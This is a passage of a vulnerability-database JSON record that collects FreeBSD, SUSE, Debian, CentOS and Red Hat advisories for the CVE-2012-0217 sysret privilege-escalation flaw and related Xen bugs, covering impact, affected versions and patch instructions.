&& rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-308.8.2.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_1, 8.1-RELEASE-p11)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.14\r\n src/sys/conf/newvers.sh 1.83.2.10.2.15\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.2\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r236953\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (FreeBSD)\r\n\r\niEYEARECAAYFAk/XQGgACgkQFdaIBMps37KCsACdEvLcb0JhWKmVlvq5SuKzuW1Q\r\nfhsAnRVLFoGa2WGnRpfQrLYCjL9gs8Rd\r\n=RvZd\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-13T00:00:00", "published": "2012-06-13T00:00:00", "id": "SECURITYVULNS:DOC:28131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28131", "title": "CVE-2012-0217", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-18 21:00:54 UTC (RELENG_8_1, 8.1-RELEASE-p12)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\n0. Revision History\r\n\r\nv1.0 2012-06-12 Initial release.\r\nv1.1 2012-06-19 Corrected patch FreeBSD 8.1.\r\n\r\nI. Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n[7.4, 8.3, 8.2, 9.0]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\n[8.1]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81.patch.asc\r\n\r\n[8.1 if original sysret.patch has been applied]\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret-81-correction.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.15\r\n src/sys/conf/newvers.sh 1.83.2.10.2.16\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.3\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r237242\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-12:04.sysret.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9\r\n\r\niEYEARECAAYFAk/gjHQACgkQFdaIBMps37KutQCgkcp+lqFuJ3/fQKUemn80suW5\r\nu/wAn2VLxY5LoUPNsN2eUHYB4GMz0AHl\r\n=tQOk\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-06-25T00:00:00", "published": "2012-06-25T00:00:00", "id": "SECURITYVULNS:DOC:28207", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28207", "title": "FreeBSD Security Advisory FreeBSD-SA-12:04.sysret [REVISED]", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "Three security issues were found in XEN.\n\n Two security issues are fixed by this update:\n\n *\n\n CVE-2012-0217: Due to incorrect fault handling in the\n XEN hypervisor it was possible for a XEN guest domain\n administrator to execute code in the XEN host environment.\n\n *\n\n CVE-2012-0218: Also a guest user could crash the\n guest XEN kernel due to a protection fault bounce.\n\n The third fix is changing the Xen behaviour on certain\n hardware:\n\n *\n\n CVE-2012-2934: The issue is a denial of service issue\n on older pre-SVM AMD CPUs (AMD Erratum 121).\n\n AMD Erratum #121 is described in "Revision Guide for\n AMD Athlon 64 and AMD Opteron Processors":\n <a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>\n <<a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>>\n\n The following 130nm and 90nm (DDR1-only) AMD\n processors are subject to this erratum:\n\n o\n\n First-generation AMD-Opteron(tm) single and\n dual core processors in either 939 or 940 packages:\n\n + AMD Opteron(tm) 100-Series Processors\n + AMD Opteron(tm) 200-Series Processors\n + AMD Opteron(tm) 800-Series Processors\n + AMD Athlon(tm) processors in either 754,\n 939 or 940 packages\n + AMD Sempron(tm) processor in either 754\n or 939 packages\n + AMD Turion(tm) Mobile Technology in 754\n package\n\n This issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except\n by upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option "allow_unsafe" for\n GRUB which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line\n looking like this:\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing\n boot options for the host.\n", "edition": 1, "modified": "2012-06-12T23:08:27", "published": "2012-06-12T23:08:27", "id": "SUSE-SU-2012:0730-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00008.html", "title": "Security update for Xen (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:05:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\n\n", "edition": 1, "modified": "2012-07-18T15:08:32", "published": "2012-07-18T15:08:32", "id": "OPENSUSE-SU-2012:0886-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00008.html", "type": "suse", "title": "xen (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:41:29", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-2625", "CVE-2012-3432"], "description": "Xen was updated to fix several security issues:\n\n *\n\n CVE-2012-3433: A xen HVM guest destroy p2m teardown\n host DoS vulnerability was fixed, where malicious guest\n could lock/crash the host.\n\n *\n\n CVE-2012-3432: A xen HVM guest user mode MMIO\n emulation DoS was fixed.\n\n *\n\n CVE-2012-2625: The xen pv bootloader doesn't check\n the size of the bzip2 or lzma compressed kernel, leading to\n denial of service (crash).\n\n Also the following bug in XEN has been fixed:\n\n * bnc#746702 - Xen HVM DomU crash during Windows Server\n 2008 R2 install, when maxmem > memory\n\n This update also included bugfixes for:\n\n *\n\n vm-install: - bnc#762963 - ReaR: Unable to recover a\n paravirtualized XEN guest\n\n *\n\n virt-manager - SLE11-SP2 ONLY\n\n * bnc#764982 - virt-manager fails to start after\n upgrade to SLES11 SP2 from SLES10\n", "edition": 1, "modified": "2012-08-27T17:08:36", "published": "2012-08-27T17:08:36", "id": "SUSE-SU-2012:1043-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00024.html", "title": "Security update for Xen and libvirt (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:04:33", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-2625", "CVE-2012-3432"], "description": "Xen was updated to fix several security issues:\n\n *\n\n CVE-2012-3433: A xen HVM guest destroy p2m teardown\n host DoS vulnerability was fixed, where malicious guest\n could lock/crash the host.\n\n *\n\n CVE-2012-3432: A xen HVM guest user mode MMIO\n emulation DoS was fixed.\n\n *\n\n CVE-2012-2625: The xen pv bootloader doesn't check\n the size of the bzip2 or lzma compressed kernel, leading to\n denial of service (crash).\n\n Also the following bug in XEN was fixed:\n\n * bnc#746702 - Xen HVM DomU crash during Windows Server\n 2008 R2 install, when maxmem > memory\n\n This update also included bugfixes for:\n\n * vm-install: - bnc#762963 - ReaR: Unable to recover a\n paravirtualized XEN guest\n", "edition": 1, "modified": "2012-08-27T17:08:38", "published": "2012-08-27T17:08:38", "id": "SUSE-SU-2012:1044-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00025.html", "title": "Security update for Xen (important)", "type": "suse", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3433", "CVE-2012-3494", "CVE-2012-3515", "CVE-2012-3496", "CVE-2012-2625", "CVE-2012-3432"], "description": "Security Update for Xen\n\n Following fixes were done:\n - bnc#776995 - attaching scsi control luns with pvscsi\n - xend/pvscsi: fix passing of SCSI control LUNs\n xen-bug776995-pvscsi-no-devname.patch\n - xend/pvscsi: fix usage of persistant device names for\n SCSI devices xen-bug776995-pvscsi-persistent-names.patch\n - xend/pvscsi: update sysfs parser for Linux 3.0\n xen-bug776995-pvscsi-sysfs-parser.patch\n\n - bnc#777090 - VUL-0: CVE-2012-3494: xen: hypercall\n set_debugreg vulnerability (XSA-12)\n CVE-2012-3494-xsa12.patch\n - bnc#777091 - VUL-0: CVE-2012-3496: xen:\n XENMEM_populate_physmap DoS vulnerability (XSA-14)\n CVE-2012-3496-xsa14.patch\n - bnc#777084 - VUL-0: CVE-2012-3515: xen: Qemu VT100\n emulation vulnerability (XSA-17) CVE-2012-3515-xsa17.patch\n\n - bnc#744771 - VM with passed through PCI card fails to\n reboot under dom0 load 24888-pci-release-devices.patch\n\n - Upstream patches from Jan\n 25431-x86-EDD-MBR-sig-check.patch\n 25459-page-list-splice.patch\n 25478-x86-unknown-NMI-deadlock.patch\n 25480-x86_64-sysret-canonical.patch\n 25481-x86_64-AMD-erratum-121.patch\n 25485-x86_64-canonical-checks.patch\n 25587-param-parse-limit.patch 25617-vtd-qinval-addr.patch\n 25688-x86-nr_irqs_gsi.patch\n\n - bnc#773393 - VUL-0: CVE-2012-3433: xen: HVM guest destroy\n p2m teardown host DoS vulnerability\n CVE-2012-3433-xsa11.patch\n - bnc#773401 - VUL-1: CVE-2012-3432: xen: HVM guest user\n mode MMIO emulation DoS\n 25682-x86-inconsistent-io-state.patch\n\n - bnc#762484 - VUL-1: CVE-2012-2625: xen: pv bootloader\n doesn't check the size of the bzip2 or lzma compressed\n kernel, leading to denial of service\n 25589-pygrub-size-limits.patch\n\n", "edition": 1, "modified": "2012-09-14T14:12:18", "published": "2012-09-14T14:12:18", "id": "OPENSUSE-SU-2012:1174-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-09/msg00018.html", "title": "Security Update for Xen (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2501-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJune 24, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217 CVE-2012-0218 CVE-2012-2934\n\nSeveral vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\n\tXen does not properly handle uncanonical return addresses on\n\tIntel amd64 CPUs, allowing amd64 PV guests to elevate to\n\thypervisor privileges. AMD processors, HVM and i386 guests\n\tare not affected.\n\nCVE-2012-0218\n\tXen does not properly handle SYSCALL and SYSENTER instructions\n\tin PV guests, allowing unprivileged users inside a guest\n\tsystem to crash the guest system.\n\nCVE-2012-2934\n\tXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the "allow_unsafe" option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2012-06-24T15:22:55", "published": "2012-06-24T15:22:55", "id": "DEBIAN:DSA-2501-1:A44C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00140.html", "title": "[SECURITY] [DSA 2501-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2508-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJuly 22, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kfreebsd-8\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217\nDebian Bug : 677297\n\nRafal Wojtczuk from Bromium discovered that FreeBSD wasn't handling correctly\nuncanonical return addresses on Intel amd64 CPUs, allowing privilege escalation\nto kernel for local users.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 8.1+dfsg-8+squeeze3.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 8.3-4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.3-4.\n\nWe recommend that you upgrade your kfreebsd-8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2012-07-22T12:23:05", "published": "2012-07-22T12:23:05", "id": "DEBIAN:DSA-2508-1:4DE0E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00155.html", "title": "[SECURITY] [DSA 2508-1] kfreebsd-8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0721\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-June/030716.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0721.html", "edition": 3, "modified": "2012-06-13T00:11:19", "published": "2012-06-13T00:11:19", "href": "http://lists.centos.org/pipermail/centos-announce/2012-June/030716.html", "id": "CESA-2012:0721", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:15", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* It was found that the Xen hypervisor implementation as shipped with Red\nHat Enterprise Linux 5 did not properly restrict the syscall return\naddresses in the sysret return path to canonical addresses. An unprivileged\nuser in a 64-bit para-virtualized guest, that is running on a 64-bit host\nthat has an Intel CPU, could use this flaw to crash the host or,\npotentially, escalate their privileges, allowing them to execute arbitrary\ncode at the hypervisor level. (CVE-2012-0217, Important)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs, leading\nto a CPU hard lockup, when running on the Xen hypervisor implementation. An\nunprivileged user in a 64-bit para-virtualized guest could use this flaw to\ncrash the host. Warning: After installing this update, hosts that are using\nan affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\nfail to boot. In order to boot such hosts, the new kernel parameter,\nallow_unsafe, can be used (\"allow_unsafe=on\"). This option should only be\nused with hosts that are running trusted guests, as setting it to \"on\"\nreintroduces the flaw (allowing guests to crash the host). (CVE-2012-2934,\nModerate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users can\nexploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these issues.\nUpstream acknowledges Rafal Wojtczuk as the original reporter of\nCVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "modified": "2017-09-08T11:50:07", "published": "2012-06-12T04:00:00", "id": "RHSA-2012:0721", "href": "https://access.redhat.com/errata/RHSA-2012:0721", "type": "redhat", "title": "(RHSA-2012:0721) Important: kernel security update", "cvss": 